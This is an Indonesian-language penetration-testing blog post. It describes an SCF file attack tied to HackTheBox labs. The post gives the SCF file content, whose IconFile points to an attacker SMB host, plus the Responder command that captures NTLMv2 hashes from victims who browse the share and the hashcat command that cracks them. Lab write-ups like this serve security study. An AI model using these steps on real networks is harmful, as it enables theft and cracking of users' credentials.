Post

SCF File Attack

Bukan hal baru bahwa file SCF (Shell Command Files) dapat digunakan untuk melakukan serangakaian perintah Windows Explorer yang sangat terbatas.

Dengan kemampuan ini penyerang dapat memanfaatkannya untuk mendapatkan NTLMv2 atau bahkan SMB Relay Attack.

Contoh Lab yang menggunakan skenario serangan ini:

  • HackTheBox - Sizzle
  • HackTheBox - Driver

Tahap Eksploitasi

Step 1: Temukan File Share untuk Upload File

Permata-tama temukan terlebih dahulu target file share yang dapat kita upload file SCF.

Pada contoh kali ini, direktori Users/Public dapat diakses oleh SMB NULL Session.

Memeriksa Hak Akses SMB Share

Step 2: Buat File SCF

Setelah mendapatkan tempat yang bisa di-upload file, selanjutnya buat file SCF seperti berikut dan upload ke file share target.

1
2
3
4
5
6
cat @nairpaa.scf 
[Shell]
Command=2
IconFile=\\<ip-attacker>\share\test.ico
[Taskbar]
Command=ToggleDesktopv

File SCF menggunakan ekstensi .scf. Dan penamaan file yang diawali @ dilakukan agar file berada di posisi atas pada share drive.

Upload SCF File ke SMB Share

Step 3: Jalankan Responsder

Setelah itu jalankan responsder dan tunggu korban mengakses share tersebut untuk mendapatkan hash NTLMv2.

1
sudo responder -I eth0 -rdw

Mendapatkan NTLMv2 hash

Step 4: Crack The Hash

1
➜ hashcat -m 5600 pass.hash /usr/share/wordlists/rockyou.txt

Serangan ini bisa juga digunakan untuk SMB Relay Attack](/posts/smb-relay/).


Referensi

  • https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
This post is licensed under CC BY 4.0 by the author.